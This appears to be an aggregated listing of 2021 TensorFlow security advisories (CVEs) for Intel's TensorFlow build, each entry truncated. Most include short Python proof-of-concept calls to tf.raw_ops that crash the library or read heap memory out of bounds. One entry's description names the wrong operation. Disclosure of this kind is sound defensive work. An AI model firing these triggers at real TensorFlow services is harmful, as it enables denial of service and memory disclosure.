Intel Optimization For Tensorflow vulnerabilities

CVE-2021-29553 [LOW] CWE-125 Heap OOB in `QuantizeAndDequantizeV3` Heap OOB in `QuantizeAndDequantizeV3` ### Impact An attacker can read data outside of bounds of heap allocated buffer in `tf.raw_ops.QuantizeAndDequantizeV3`: ```python import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3) ``` This is because the [implementation](https://github.com/tensorf

CVE-2021-29538 [LOW] CWE-369 Division by zero in `Conv2DBackpropFilter` Division by zero in `Conv2DBackpropFilter` ### Impact An attacker can cause a division by zero to occur in `Conv2DBackpropFilter`: ```python import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor,

CVE-2021-29575 [LOW] CWE-119 Overflow/denial of service in `tf.raw_ops.ReverseSequence` Overflow/denial of service in `tf.raw_ops.ReverseSequence` ### Impact The implementation of `tf.raw_ops.ReverseSequence` allows for stack overflow and/or `CHECK`-fail based denial of service. ```python import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, ba

CVE-2021-29516 [LOW] CWE-476 Null pointer dereference via invalid Ragged Tensors Null pointer dereference via invalid Ragged Tensors ### Impact Calling `tf.raw_ops.RaggedTensorToVariant` with arguments specifying an invalid ragged tensor results in a null pointer dereference: ```python import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, fi

CVE-2021-29545 [LOW] CWE-131 Heap buffer overflow in `SparseTensorToCSRSparseMatrix` Heap buffer overflow in `SparseTensorToCSRSparseMatrix` ### Impact An attacker can trigger a denial of service via a `CHECK`-fail in converting sparse tensors to CSR Sparse matrices: ```python import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([0.0], dtype=np.float32) dense_shape = [0, 0] s

CVE-2021-29551 [LOW] CWE-125 OOB read in `MatrixTriangularSolve` OOB read in `MatrixTriangularSolve` ### Impact The implementation of [`MatrixTriangularSolve`](https://github.com/tensorflow/tensorflow/blob/8cae746d8449c7dda5298327353d68613f16e798/tensorflow/core/kernels/linalg/matrix_triangular_solve_op_impl.h#L160-L240) fails to terminate kernel execution if one validation condition fails: ```cc void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { O

CVE-2021-29584 [LOW] CWE-190 CHECK-fail due to integer overflow CHECK-fail due to integer overflow ### Impact An attacker can trigger a denial of service via a `CHECK`-fail in caused by an integer overflow in constructing a new tensor shape: ```python import tensorflow as tf input_layer = 2**60-1 sparse_data = tf.raw_ops.SparseSplit( split_dim=1, indices=[(0, 0), (0, 1), (0, 2), (4, 3), (5, 0), (5, 1)], values=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0], shape=(input_layer, input_layer), num_split=2, name

CVE-2021-29618 [LOW] CWE-755 Crash in `tf.transpose` with complex inputs Crash in `tf.transpose` with complex inputs ### Impact Passing a complex argument to `tf.transpose` at the same time as passing `conjugate=True` argument results in a crash: ```python import tensorflow as tf tf.transpose(conjugate=True, a=complex(1)) ``` ### Patches We have received a patch for the issue in GitHub commit [1dc6a7ce6e0b3e27a7ae650bfc05b195ca793f88](https://github.com/tensorflow/tensorflow/commit/1dc6a7ce6e

CVE-2021-29527 [LOW] CWE-369 Division by 0 in `QuantizedConv2D` Division by 0 in `QuantizedConv2D` ### Impact An attacker can trigger a division by 0 in `tf.raw_ops.QuantizedConv2D`: ```python import tensorflow as tf input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8) filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8) min_input = tf.constant(0.0) max_input = tf.constant(0.0001) min_filter = tf.constant(0.0) max_filter = tf.constant(0.0001) strides = [1, 1, 1, 1] padding = "SAME" tf.r

CVE-2021-29583 [LOW] CWE-125 Heap buffer overflow and undefined behavior in `FusedBatchNorm` Heap buffer overflow and undefined behavior in `FusedBatchNorm` ### Impact The implementation of `tf.raw_ops.FusedBatchNorm` is vulnerable to a heap buffer overflow: ```python import tensorflow as tf x = tf.zeros([10, 10, 10, 6], dtype=tf.float32) scale = tf.constant([0.0], shape=[1], dtype=tf.float32) offset = tf.constant([0.0], shape=[1], dtype=tf.float32) mean = tf.constant([0.0], shape=[1], dtype=

CVE-2021-29598 [LOW] CWE-369 Division by zero in TFLite's implementation of `SVDF` Division by zero in TFLite's implementation of `SVDF` ### Impact The implementation of the `SVDF` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/7f283ff806b2031f407db64c4d3edcda8fb9f9f5/tensorflow/lite/kernels/svdf.cc#L99-L102): ```cc const int rank = params->rank; ... TF_LITE_ENSURE_EQ(context, num_filters % rank, 0); ``` An attacker can craft a model

CVE-2021-29570 [LOW] CWE-125 Heap out of bounds read in `MaxPoolGradWithArgmax` Heap out of bounds read in `MaxPoolGradWithArgmax` ### Impact The implementation of `tf.raw_ops.MaxPoolGradWithArgmax` can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: ```python import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32)

CVE-2021-29515 [LOW] CWE-476 Reference binding to null pointer in `MatrixDiag*` ops Reference binding to null pointer in `MatrixDiag*` ops ### Impact The implementation of [`MatrixDiag*` operations](https://github.com/tensorflow/tensorflow/blob/4c4f420e68f1cfaf8f4b6e8e3eb857e9e4c3ff33/tensorflow/core/kernels/linalg/matrix_diag_op.cc#L195-L197) does not validate that the tensor arguments are non-empty: ```cc num_rows = context->input(2).flat()(0); num_cols = context->input(3).flat()(0); padding

CVE-2021-29530 [LOW] CWE-476 Invalid validation in `SparseMatrixSparseCholesky` Invalid validation in `SparseMatrixSparseCholesky` ### Impact An attacker can trigger a null pointer dereference by providing an invalid `permutation` to `tf.raw_ops.SparseMatrixSparseCholesky`: ```python import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape =

CVE-2021-29571 [LOW] CWE-787 Memory corruption in `DrawBoundingBoxesV2` Memory corruption in `DrawBoundingBoxesV2` ### Impact The implementation of `tf.raw_ops.MaxPoolGradWithArgmax` can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: ```python import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors) ``

CVE-2021-29586 [LOW] CWE-369 Division by zero in optimized pooling implementations in TFLite Division by zero in optimized pooling implementations in TFLite ### Impact Optimized pooling implementations in TFLite fail to check that the stride arguments are not 0 before calling [`ComputePaddingHeightWidth`](https://github.com/tensorflow/tensorflow/blob/3f24ccd932546416ec906a02ddd183b48a1d2c83/tensorflow/lite/kernels/pooling.cc#L90). Since users can craft special models which will have `params->s

CVE-2021-29563 [LOW] CWE-617 CHECK-fail in `tf.raw_ops.RFFT` CHECK-fail in `tf.raw_ops.RFFT` ### Impact An attacker can cause a denial of service by exploiting a `CHECK`-failure coming from the implementation of `tf.raw_ops.RFFT`: ```python import tensorflow as tf inputs = tf.constant([1], shape=[1], dtype=tf.float32) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.RFFT(input=inputs, fft_length=fft_length) ``` The above example causes Eigen code to operate on an empty ma

CVE-2021-29524 [LOW] CWE-369 Division by 0 in `Conv2DBackpropFilter` Division by 0 in `Conv2DBackpropFilter` ### Impact An attacker can trigger a division by 0 in `tf.raw_ops.Conv2DBackpropFilter`: ```python import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter

CVE-2021-29532 [LOW] CWE-125 Heap out of bounds read in `RaggedCross` Heap out of bounds read in `RaggedCross` ### Impact An attacker can force accesses outside the bounds of heap allocated arrays by passing in invalid tensor values to `tf.raw_ops.RaggedCross`: ```python import tensorflow as tf ragged_values = [] ragged_row_splits = [] sparse_indices = [] sparse_values = [] sparse_shape = [] dense_inputs_elem = tf.constant([], shape=[92, 0], dtype=tf.int64) dense_inputs = [dense_inputs_elem]

CVE-2021-29582 [LOW] CWE-125 Heap OOB read in `tf.raw_ops.Dequantize` Heap OOB read in `tf.raw_ops.Dequantize` ### Impact Due to lack of validation in `tf.raw_ops.Dequantize`, an attacker can trigger a read from outside of bounds of heap allocated data: ```python import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -